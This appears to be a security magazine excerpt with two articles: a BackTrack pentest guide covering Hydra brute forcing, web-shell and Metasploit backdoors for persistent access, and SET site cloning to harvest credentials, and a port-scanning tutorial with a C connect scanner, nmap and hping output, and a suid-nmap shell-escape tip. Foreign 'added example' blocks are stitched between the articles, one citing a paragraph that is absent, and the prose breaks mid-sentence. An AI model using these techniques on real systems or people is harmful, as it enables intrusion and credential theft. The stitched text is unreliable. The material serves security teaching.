Another angle of attack on web systems or servers is to do an all too well-publicized brute force attack. For this, tools like HYDRA and its graphical interface, HYDRA-GTK, exist (Figure 8 and Figure 9). The art of brute force attacks is firstly in the user-names you have harvested in the first stage of your attacks. Not knowing what user-name to use is just as crippling as not having the password. A successful brute force usually results in a username and password combination, and is not just a focus on one of the two. If you can take one of these out of the equation, the time needed for the attack can be halved. Thus, find the way user-names are assigned if you can. Is it only first names, or is it last name and then first letter of the first name? Or is it an email address? Which of these did you get while you gathered information? Passwords and the use of passwords is an art all on its own. With the focus so squarely put on password strength by social networks, everyone is getting used to using passwords that are not simply dictionary passwords. This makes life difficult, but not completely useless to try. Take a look at tools like JOHN THE RIPPER as it is installed on BackTrack. For a good dictionary, scour Google for a word list in the language of the site you are targeting.

Figure 8. Hydra-GTK target settings
Figure 9. Hydra-GTK username and password setup

Maintaining access: Usually before this phase, a pentester's work is done. The task was to find exploitable holes in systems and put attention on them for the client to fix. When you start entering the realm of maintaining access to an exploited system, ethics has to guide you. This too shall be disclosed to the client. Adding a backdoor script on a system can allow others to use it for easy exploitation, making you liable. But, for these backdoor types of access after a hack, BackTrack supplies a number of tools as well. If you have used METASPLOIT, it can generate a backdoor type of application for a system allowing METASPLOIT to find that system every time you test it. If the web system or site fell under your hacking charms, BackTrack includes a number of web shells for each of the major used web development languages. You can upload the selected script via the exploit you have performed, allowing you to quickly and easily access the system back-end the next time you need to without having to go through the entire process of the hack again. Stored usernames and passwords can change, but a backdoor you control into a system is under your control as long as it is not found and removed by either the administrator or another hacker.

Covering your tracks: Whenever you access a system, there are tools to log your actions. Even if it is just browsing the website, your IP and what you have requested is logged. This is why passive scanning is ideal when trying to find information without arousing suspicion. Active scans can trigger security notifications when not taking care. These can range from active protection, which will block you immediately, stopping your hack attempts in their tracks, to reactive security measures resulting in legal action and subpoenas being issued for access logs and even seizing your equipment. Thus the importance of obtaining that most important document giving you the right to test before doing so.

If all else fails, BackTrack includes social engineering tools as well. The most used of these is SET. With this tool, you can make BackTrack act and look like a legitimate website. An unsuspecting user must be lured here by any means necessary, and while not suspecting foul play, will log in, giving you the credentials. The user will then be redirected to the legitimate site, thinking he/she might have typed something wrong. To do this by hand can take some time. The site and icon need to be replicated, and then hosted on a web server. This site will then have to be altered in such a way as to reflect the typed in characters somewhere so you can harvest them. SET allows you to do all this in a few simple steps. It will pull down the site and replicate it down to a T, and then update it so that input fields will be harvested by BackTrack and displayed on the screen. It will start a web server on BackTrack as well, without the need for you to go through the effort of web server configuration or page development. And by simply fooling the targeted people to pass by your BackTrack's SET web server, you can harvest the credentials you need to further your attempts to hack the system (Figure 10). This social engineering method might not be in the spirit of the pentest, and more in the realm of pure hacking, but is a method nonetheless to obtain access to a system. It all depends on your mandate as a pentester.

A final note: BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits on systems. So much so that it also includes pure hacking tools that are outside the realm of testing and fringing on pure hacking. But it also allows the so-called “script kiddies” access to professional tools that are so easy to use that they can exploit systems without understanding what has been achieved. Thus, use BackTrack as a tool to go for pentesting. And use it as the tool to test basics, because others will. But also see BackTrack as a tool, and understand what you are looking at when investigating systems for security vulnerabilities. It does put you on the right track. And applying what you have seen as results out of BackTrack will put you on the right track to security, or assisting in the security of an environment. BackTrack is vast, and so is the underlying knowledge that drives the included tools. And only by exercise and the self-motivation to learn and understand can it be of value to you and your client.
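The article's remark that removing displayed server versions hardens a site against version scans (the websecurify paragraph above) is the one piece of advice here a defender can act on directly. The following configuration fragment is an added example, not the article's or the BackTrack project's; it assumes an Apache httpd server with optional PHP, and the directives shown are standard httpd and php.ini settings.

```apache
# Apache httpd (httpd.conf or a conf.d/ snippet): stop advertising the version.
# ServerTokens Prod trims the Server response header down to just "Apache";
# ServerSignature Off removes the version footer from generated error pages
# and directory listings, which is what banner scanners read.
ServerTokens Prod
ServerSignature Off

# If PHP runs behind this server, also stop the X-Powered-By header (php.ini):
#   expose_php = Off
```

The nginx equivalent is `server_tokens off;` in the `http` block. Verify the change from outside with `curl -sI http://<your host>/` and check that the `Server` header no longer carries a version and that `X-Powered-By` is gone. The CMS version checks the article goes on to describe (Joomscan, WPSCAN) read the application itself rather than the web server banner, so these directives do not hide those; keeping the CMS, plug-ins and modules updated is what closes the "old versions" problem the article points out.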
Figure 10. SET Start page with scan types

LLOYD WILKE
Lloyd Wilke is the Director of Webstyles Internet Solutions. He's in charge of Webstyles Client Relations and Product Support. Lloyd has launched several successful hosting and backup solutions and a new client website penetration testing division. This has provided a platform for our clients to expand their business presence with minimal cost and get maximum exposure. Webstyles Internet Solutions was started in 2007, offering web hosting as the main service; this has increased over time to offer online backups and website pentesting. WebStyles entered into an agreement with Starship Systems (www.starshipsystems.com) to extend and complete its security offerings to the market. In addition to security services, WebStyles now also offers training and the sharing of knowledge on practical business security.
Network Scanning: The Basic Tools

Scanning is one of the first steps to obtain information about a network, its services and hosts. While there are numerous tools, most of them fail to give a complete explanation of what is going on “under the hood”. This article will try to explain the basic techniques used under the hood of great scanners such as nmap and so forth. This will allow the reader not only to have a better understanding of how network scanners work in the discovery phase, but also to be able to implement their own scanners or use other programs to gather this information in case nmap or other tools would trigger IDS signatures and the engagement requires not being caught by it (Red Team).

Scanning is one of the first steps enabling one to obtain valuable information about the network. Scanning is the most used and most detected part of an attack, since it gives the attacker vital information such as which machines are reachable and which services each machine has turned on or is offering within the reach of the attacker. Scanning is often underrated and is not really taken care of properly; scanning is an art and should be treated accordingly. There are basic and advanced techniques, some of which will be covered within this article. Some introduction into TCP/IP and UDP will be covered to give background on the techniques covered.

A Good Scan is as Good as Half of the Penetration on the Machine

You sit down and connect to the network, you get connected and have access, you smile verifying that all the tools are updated, get the notes ready and the encrypted directory, and fire up the nmap scanner. The client wants a full detailed report and packet dump for further analysis by their forensic team, so you turn on tcpdump and let it record. The client approaches and the conversation goes like this:

• “So how is the engagement going? Any problems?”
• “No sir, no problem, right now I’m just doing a network discovery scan”
• “What is that?”
• “I’m just looking for ‘live’ hosts and open ports”
• “… explain to me, what is this program doing? How does it work?”

TCP/IP

The Transfer Control Protocol (or TCP as a short name) is a transfer protocol (I’m sure the name gave it away); the name TCP/IP refers to an entire suite of data communication protocols; the name comes from adding the Transfer Control Protocol and the Internet Protocol. TCP is a connection-oriented protocol. Whenever a packet arrives, it gets checked and an acknowledgement packet (ACK) is sent to refer to the particular packet and tell the sender that it arrived. Each packet has a specific number. The ID
Listing 1. Basic connecting program written in C for Linux

/*
 * connect-scan.c
 *
 * Fast connect scanner written for demonstration only, this is for educational purposes only
 *
 * Copyright 2003(C) Enrique Alfonso Sanchez Montellano
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Resolve a hostname or dotted IP into a network-order IPv4 address; 0 on failure */
uint32_t resolve(char *serv)
{
    struct sockaddr_in sinn;
    struct hostent *hent;

    hent = gethostbyname(serv);
    if (!hent)
        return 0;
    bzero((char *)&sinn, sizeof(sinn));
    memcpy((char *)&sinn.sin_addr, hent->h_addr, hent->h_length);
    return sinn.sin_addr.s_addr;
}

/* Complete a full TCP connect() to one port and report whether it is open or closed */
int connect_2_port(uint32_t victim, u_long port)
{
    int sockfd;
    struct sockaddr_in hostaddr;

    fprintf(stderr, "Trying port %lu\t\t", port);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        fprintf(stderr, "Cannot allocate socket\n");
        return -1;
    }
    bzero((char *)&hostaddr, sizeof(hostaddr));
    hostaddr.sin_port = htons(port);
    hostaddr.sin_addr.s_addr = victim;
    hostaddr.sin_family = AF_INET;
    if ((connect(sockfd, (struct sockaddr *)&hostaddr, sizeof(hostaddr))) != 0) {
        fprintf(stderr, "Closed port\n");
    } else {
        fprintf(stderr, "Open port\n");
    }
    close(sockfd);
    return 0;
}

void usage(char *name)
{
    fprintf(stderr, "Usage: %s -h <host> -s <start port> -e <end port>\n", name);
    fprintf(stderr, "\th: Host to scan\n");
    fprintf(stderr, "\ts: start port (default is 1)\n");
    fprintf(stderr, "\te: end port (default is 6000)\n");
    fprintf(stderr, "Bugs and comments to [email protected]\n\n");
    exit(0);
}

int main(int argc, char **argv)
{
    int start_port = 1, end_port = 6000;
    int option, i;
    char *victim = NULL;
    uint32_t resolved_addie;

    if (argc < 2) {
        usage(argv[0]);
    }

    while ((option = getopt(argc, argv, "h:s:e:")) != EOF) {
        switch (option) {
        case 'h':
            victim = optarg;
            break;
        case 's':
            start_port = atoi(optarg);
            if ((start_port < 0) || (start_port > 65535)) {
                fprintf(stderr, "Negative or bigger than actual ports detected setting to 1\n");
                start_port = 1;
            }
            break;
        case 'e':
            end_port = atoi(optarg);
            if ((end_port < 0) || (end_port > 65535) || (end_port < start_port)) {
                fprintf(stderr, "Weird stuff going on, either end port negative, over 65535 or lower than start port ... setting to port 2\n");
                end_port = 2;
            }
            break;
        }
    }

    if (!victim) {                       /* -h is mandatory */
        usage(argv[0]);
    }
    resolved_addie = resolve(victim);
    if (!resolved_addie) {
        fprintf(stderr, "Cannot resolve %s\n", victim);
        return 1;
    }
    for (i = start_port; i <= end_port; i++) {
        connect_2_port(resolved_addie, i);
    }
    return 0;
}
number of it is the number the host will refer to; it enables telling which connection it comes from and whether it is in order or is missing. An example of a TCP connection is the following: a client (C) sends a synchronize packet to the server (S) to initiate a connection; this packet contains a number to synchronize with (C(syn)). Then the server replies with the number the server will use to start the connection and an acknowledgement of the first packet being received, with the number the client sent + 1 (S(syn/C(ack + 1))). At the end the client sends an acknowledgement packet with the number the server sent + 1 (C(S(ack + 1))). This is to synchronize and have the numbers straight; this way, if packet 3 arrives before packet 2 the receiver waits for packet 2 and, if it times out, it can send a packet asking for packet 2 again to be able to have the connection in the right order and complete.

This is called the “3 way handshake”. This is a very important process to understand, since some techniques are based on the way TCP handles connections and on how different operating systems have implemented this. The majority of people I encounter do not realize that being able to sniff a network is not a good thing, not only because you can see passwords all over the place, but because you can take over connections. After the connection is done, the only thing is that packets increment by 1 to be able to refer to them, so when you see packets 1 and 2 passing, you know that packet 3 is coming. And, if the attacker manages to send packet 3 before the real connection does, it can take over the connection due to the fact that it is not synchronized. The receiver sees that packet 3 has already been received and thinks it is a delay or a repeat and silently drops it.

A lot of things can be done with badly implemented TCP/IP stacks on operating systems and we will see some of them in this article.

Types of Scans

Connectivity Scan

This type of scan requires that the whole 3-way TCP connection is established and uses normal sockets; this means you don’t need super user privileges to be able to run this scan and that any user can do it. This is usually logged even on the host, due to the fact that you have to complete the whole connection. Writing a socket scanner is very easy; we are reinventing the wheel right now, but for the sake of technicality, we are going to write our own fast socket scanner (Listing 1).

The function resolve() executes a gethostbyname() and stores the result into a sockaddr_in structure for further use and connections. This is a fairly generic function that can be reused in other programs, so it is a good idea to either have it in a separate C file in case of multiple projects or, in case of a bigger project, to design it so that it can be maintained on its own. But our scanner is fairly small and for readability we have it within our code (Listing 2).

Next, the function connect_2_port() does the actual connection; this is done by taking the result of the resolve function and the port, creating a socket and filling in the correct information (Listing 3).

As you can see, writing a fast scanner based on sockets and pure connection is easy; you can also use “canned tools” such as nmap (great scanner and the industry standard): Listing 4.

As the reader can see, nmap gathers and shows more information than our scanner. If you want to add the services you can parse the /etc/services file and add them, but if you are writing your own
Listing 2. Function to resolve into a sockaddr_in structure the IP Address or hostname given uint32_t resolve (char *serv) { struct sockaddr_in sinn ; //structure to ll out with the result of gethostbyname() struct hostent *hent; hent = gethostbyname (serv); // We execute gethostbyname() // If we could not resolve we return 0 if(!hent ) return 0; bzero ((char *) &sinn, sizeof (sinn)); memcpy ((char *) &sinn.sin_addr , hent-> h_addr , hent-> h_length ); return sinn.sin_addr .s_addr ; // Else we return the resolved address as a unsigned int }
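The handshake and the take-over described above, as an added example that is not code from the article: a small model of both endpoints' sequence-number state, the three handshake segments, and the acceptance check that makes a forged "packet 3" win over the real one. The initial sequence numbers are constructed; a real stack picks them unpredictably, which is exactly what makes this take-over hard against modern systems.

```python
"""Model of the TCP three-way handshake and of the check that decides
whether a later segment is accepted or dropped as a duplicate.

Added example, not code from the article. Initial sequence numbers below
are constructed; a real stack picks them unpredictably."""

from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Segment:
    sender: str           # "C" (client), "S" (server) or "X" (attacker)
    flags: str            # "SYN", "SYN/ACK" or "ACK"
    seq: int              # sequence number carried by the segment
    ack: Optional[int]    # acknowledgement number, None if ACK is off
    payload: int = 0      # payload length in bytes


@dataclass
class Endpoint:
    """The two numbers each side keeps once the handshake is done."""
    snd_nxt: int          # next sequence number this side will send
    rcv_nxt: int          # next sequence number this side expects
    accepted: List[Segment] = field(default_factory=list)

    def receive(self, seg: Segment) -> bool:
        """Accept a data segment only if it starts exactly at rcv_nxt.

        Anything else is treated as a delayed or repeated segment and is
        silently dropped: whoever delivers the expected number first
        wins, the legitimate copy that arrives later is ignored."""
        if seg.seq != self.rcv_nxt:
            return False
        self.rcv_nxt += seg.payload   # sequence space counts bytes, not packets
        self.accepted.append(seg)
        return True


def three_way_handshake(client_isn: int, server_isn: int) -> Tuple[List[Segment], Endpoint, Endpoint]:
    """Return the three handshake segments and both endpoints' state.

    C(syn) is client_isn, S(syn) is server_isn; SYN occupies one sequence
    number, so each side acknowledges the other's ISN + 1."""
    syn = Segment("C", "SYN", seq=client_isn, ack=None)
    syn_ack = Segment("S", "SYN/ACK", seq=server_isn, ack=client_isn + 1)
    ack = Segment("C", "ACK", seq=client_isn + 1, ack=server_isn + 1)
    client = Endpoint(snd_nxt=client_isn + 1, rcv_nxt=server_isn + 1)
    server = Endpoint(snd_nxt=server_isn + 1, rcv_nxt=client_isn + 1)
    return [syn, syn_ack, ack], client, server


def takeover_demo(client_isn: int = 1000, server_isn: int = 5000) -> Tuple[bool, bool, int]:
    """Replay the take-over described in the text with 10-byte segments.

    Returns (forged packet 3 accepted?, real packet 3 accepted?,
    server.rcv_nxt afterwards)."""
    _, client, server = three_way_handshake(client_isn, server_isn)
    # packets 1 and 2 come from the real client; a sniffer sees both
    for _ in range(2):
        server.receive(Segment("C", "ACK", client.snd_nxt, server.snd_nxt, 10))
        client.snd_nxt += 10
    # the sniffer now knows the next expected seq and delivers "packet 3" first
    forged = Segment("X", "ACK", client.snd_nxt, server.snd_nxt, 10)
    forged_ok = server.receive(forged)
    # the real packet 3 arrives later with the same seq: dropped as a repeat
    real = Segment("C", "ACK", client.snd_nxt, server.snd_nxt, 10)
    real_ok = server.receive(real)
    return forged_ok, real_ok, server.rcv_nxt


if __name__ == "__main__":
    segments, _, _ = three_way_handshake(1000, 5000)
    for s in segments:
        print(f"{s.sender} -> {s.flags:8s} seq={s.seq} ack={s.ack}")
    print("forged accepted, real accepted, rcv_nxt:", takeover_demo())
```

Run it and the three printed lines are the C(syn), S(syn)/ack and final ack exchange from the text; takeover_demo() returns (True, False, 1031): the forged segment is accepted, the genuine one is dropped as a repeat.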
scanner, you probably know a couple of the most used ports, don't you? As was said before, this type of scan is really noisy: the host sometimes logs it itself (when the service runs under TCP wrappers, for instance), so expect your IDS to go bananas as soon as you run a port scanner with this option.

Listing 3. connect_2_port function

int connect_2_port(uint32_t victim, u_long port)
{
    int sockfd;
    struct sockaddr_in hostaddr;

    fprintf(stderr, "Trying port %lu\t\t", port);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {   // create socket
        fprintf(stderr, "Cannot allocate socket\n");
        return -1;
    }
    bzero(&hostaddr, sizeof(hostaddr));
    hostaddr.sin_port = htons(port);        // fill out the port we are going to connect to
    hostaddr.sin_addr.s_addr = victim;      // fill out the address we are going to connect to
    hostaddr.sin_family = AF_INET;
    if ((connect(sockfd, (struct sockaddr *)&hostaddr, sizeof(hostaddr))) != 0) {
        fprintf(stderr, "Closed port\n");
    } else {
        fprintf(stderr, "Open port\n");
    }
    close(sockfd);
    return 0;
}

Listing 4. nmap output for a full connect scan

nahual@fscking:~$ nmap -sT -n 127.0.0.1        // we are going to scan ourselves to make it fast
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
111/tcp    open        sunrpc

Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
nahual@fscking:~$

SYN Scan
In this type of scan the connection is not completed: instead of sending the last part of the 3-way handshake, a RST is sent. A SYN is sent, a SYN/ACK is received, and then a RST goes out instead of the ACK. This type of port scan is not logged by the host, since the application never gets a completed connection to log (unless you have a host-based IDS, in which case it is the IDS doing the logging, not the host). It used to be logged on kernel 2.0.x, since there was a bug in which the connection was accepted really fast, but the bug was fixed so it does not get logged anymore.
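The same connect() the C scanner in Listings 1 to 3 makes, written against Python's socket module as an added example (not the article's code), with the two things a practitioner adds first: a per-port timeout, because a firewall that silently drops the SYN would otherwise hold the C scanner for the kernel's full connect timeout on every port, and a three-state result (open, closed, filtered) instead of open/closed. service_name() does the /etc/services lookup the text mentions via getservbyport(). demo_localhost() is a constructed setup that binds one listening socket on 127.0.0.1 so the example runs offline.

```python
"""Connect scan (full three-way handshake, no privileges needed) with a
timeout and a three-state result. Added example, not the article's code.
Assumes IPv4 and a Linux-style errno mapping: RST -> ConnectionRefusedError."""

import socket
from typing import Dict, Tuple


def connect_scan_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Complete the handshake like Listing 3 does, then close.

    open     -> connect() succeeded (SYN, SYN/ACK, ACK all went through)
    closed   -> a RST came back (ECONNREFUSED)
    filtered -> nothing came back before the timeout (or no route at all)
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"
        except OSError:
            # EHOSTUNREACH / ENETUNREACH: treat like a dropped probe
            return "filtered"


def service_name(port: int, proto: str = "tcp") -> str:
    """Name from the system's /etc/services, '?' when the port is not listed."""
    try:
        return socket.getservbyport(port, proto)
    except OSError:
        return "?"


def connect_scan(host: str, start: int, end: int, timeout: float = 1.0) -> Dict[int, str]:
    """Scan start..end inclusive, returning {port: state}."""
    return {p: connect_scan_port(host, p, timeout) for p in range(start, end + 1)}


def demo_localhost() -> Tuple[str, str]:
    """Constructed check: one listening socket on 127.0.0.1 (open) and a
    port that was bound and released, so nothing listens there (closed).
    Returns the two states."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)                       # the kernel completes the handshake for us
    open_port = listener.getsockname()[1]

    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                              # nothing listens on closed_port any more

    result = (connect_scan_port("127.0.0.1", open_port),
              connect_scan_port("127.0.0.1", closed_port))
    listener.close()
    return result


if __name__ == "__main__":
    print(demo_localhost())
    for port, state in connect_scan("127.0.0.1", 20, 30, timeout=0.5).items():
        print(f"{port}/tcp\t{state}\t{service_name(port)}")
```

The timeout value is the knob that matters on a real engagement: too short and slow hosts show up as filtered, too long and a firewalled range takes hours; a second per port is a usual starting point.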
This is one of the most widely used methods of scanning. It is faster than the connect scan, since you do not have to wait for the connection to finish to know that the port is open: as soon as you get a SYN/ACK you know the port is open and add it to the list of open ports. You can use nmap; in this case use the -sS option instead of -sT: Listing 5.

Listing 5. nmap execution of a SYN scan without root privileges

nahual@fscking:~$ nmap -sS -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
You requested a scan type which requires r00t privileges, and you do not have them.
QUITTING!
nahual@fscking:~$

What happened? This type of scan requires root, since you have to open raw sockets to be able to close the connection in a different way, or to not complete it at all by building the packets yourself rather than having the kernel fill in most of the fields. I wouldn't recommend making nmap suid, since it could have bugs which could be exploited (in older versions, if nmap was suid you could just run nmap --interactive and then !/bin/sh your way into root), so su or sudo to the root account and try the scan again: Listing 6.

Listing 6. nmap output of a SYN scan

nahual@fscking:~$ su
Password:                       // type root's password here
If there was justice in the world, "trust" would be a four-letter word.
root@fscking:~# nmap -sS -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
111/tcp    open        sunrpc

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
root@fscking:~#

By now you must be wondering why I'm using the -n option and not saying anything about it. The -n option tells the program not to resolve the IP address or name (as weird as it sounds) when printing it, meaning it will not resolve localhost to 127.0.0.1 and then try to resolve 127.0.0.1 back to a name in order to print it; that would take more time, and we are not going to waste any time on that!

But using canned tools without knowing how they work underneath is not that good, is not fun, and in complex scenarios it might even get you in trouble. We are going to use one of my favorite tools: hping. Hping is written by Salvatore Sanfilippo (antirez); you can find it at http://www.kyuzz.org/antirez/hping2.html or just apt-get install hping3 on a Debian-based distribution (Kali, the successor to BackTrack, already contains hping). This tool lets us create packets with whatever options we want without having to code an entire packet creator ourselves, so we will port scan the same machine with hping. To run hping you need to be root, and you need to read up on some of the options. This is not as "clean" as nmap, which gives you everything already processed; that is because hping creates packets, sends them and shows you the response, so the interpretation is left to the user. It is more flexible and you can read the results for yourself. Some options are discussed here and some are not; check your man page for more details. Hping can take a huge number of options; the most important ones are:

• -S: set the SYN flag in the TCP packet
• -A: set the ACK flag in the TCP packet
• -r: print the IP id field of each reply relative to the previous reply (+N)
• -a: spoof the source address, using the address written right after the option as if the packet was sent from it
• -p: destination port for the packet (-p ++N starts at port N and increments the port after every packet)
• -i: interval between packets (with a u prefix, e.g. -i u1000, the value is in microseconds)

Now let's see what a closed port looks like in hping: Listing 7.

Listing 7. hping sending SYN packets to a closed port

root@fscking:~# hping -S -p 130 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=0 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=1 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=2 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=3 win=0 rtt=0.2 ms

--- 127.0.0.1 hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.3/0.5 ms
root@fscking:~#

Listing 8. hping sending SYN packets to an open port

root@fscking:~# hping -S -p 22 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32767 rtt=1.7 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=1 win=32767 rtt=0.3 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=2 win=32767 rtt=0.3 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=3 win=32767 rtt=0.2 ms

--- 127.0.0.1 hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.6/1.7 ms
root@fscking:~#

Listing 9. hping sending one packet to each port, incrementing the port after each packet

root@fscking:~# hping -S -p ++ 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=1 flags=RA seq=1 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=2 flags=RA seq=2 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=3 flags=RA seq=3 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=4 flags=RA seq=4 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=5 flags=RA seq=5 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=6 flags=RA seq=6 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=7 flags=RA seq=7 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=8 flags=RA seq=8 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=9 flags=RA seq=9 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=10 flags=RA seq=10 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=11 flags=RA seq=11 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=12 flags=RA seq=12 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=13 flags=RA seq=13 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=14 flags=RA seq=14 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=15 flags=RA seq=15 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=16 flags=RA seq=16 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=17 flags=RA seq=17 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=18 flags=RA seq=18 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=19 flags=RA seq=19 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=20 flags=RA seq=20 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=21 flags=RA seq=21 win=0 rtt=0.1 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.7 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=24 flags=RA seq=24 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=RA seq=25 win=0 rtt=0.2 ms

--- 127.0.0.1 hping statistic ---
26 packets tramitted, 26 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.2/0.7 ms
root@fscking:~#

Listing 10. hping sending SYN packets, with grep keeping only the open ports

root@fscking:~# hping -S -p ++ 127.0.0.1 -i u1000 | grep SA
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.2 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=111 flags=SA seq=111 win=32767 rtt=0.1 ms

--- 127.0.0.1 hping statistic ---
810 packets tramitted, 810 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.7 ms
root@fscking:~#

Listing 11. nmap executing a FIN scan

root@fscking:~# nmap -sF -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
111/tcp    open        sunrpc

Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
root@fscking:~#
If we read along the line and look for flags, we get the flags the returned packet has, which are RA: R for RST and A for ACK. This means the server got the SYN packet (because of the ACK) but the port is closed (it is not offering any service), since the R flag is on. Another nice indication is that the window size is 0, saying you cannot send any data to that port (since it is closed, of course!). If the port is open the result looks like this: Listing 8. The reader can see how the flags section has changed from RA to SA, S for SYN and A for ACK, meaning the port is open; the window size is also different from 0, meaning you can send data through that port.

But running one command per port and reading everything can be trying; how can I send to each port? We use the -p option with ++: Listing 9. The sport field of each reply is the port we probed on the server (the server's source port is our destination port). We can see that all ports apart from port 22 are closed, since 22 is the only one with SA and a window size different from 0.

To make it faster and easier to read we can use grep, and the -i option to send faster: Listing 10. We sent 810 packets but used grep to print only the replies with the SA flags, meaning only the open ports, and we get the same result as the other scans: port 22 and port 111 are open.

Listing 12. hping used to execute a FIN scan

root@fscking:~# hping -F 127.0.0.1 -p ++
HPING 127.0.0.1 (lo 127.0.0.1): F set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=1 flags=RA seq=1 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=2 flags=RA seq=2 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=3 flags=RA seq=3 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=4 flags=RA seq=4 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=5 flags=RA seq=5 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=6 flags=RA seq=6 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=7 flags=RA seq=7 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=8 flags=RA seq=8 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=9 flags=RA seq=9 win=0 rtt=0.2 ms
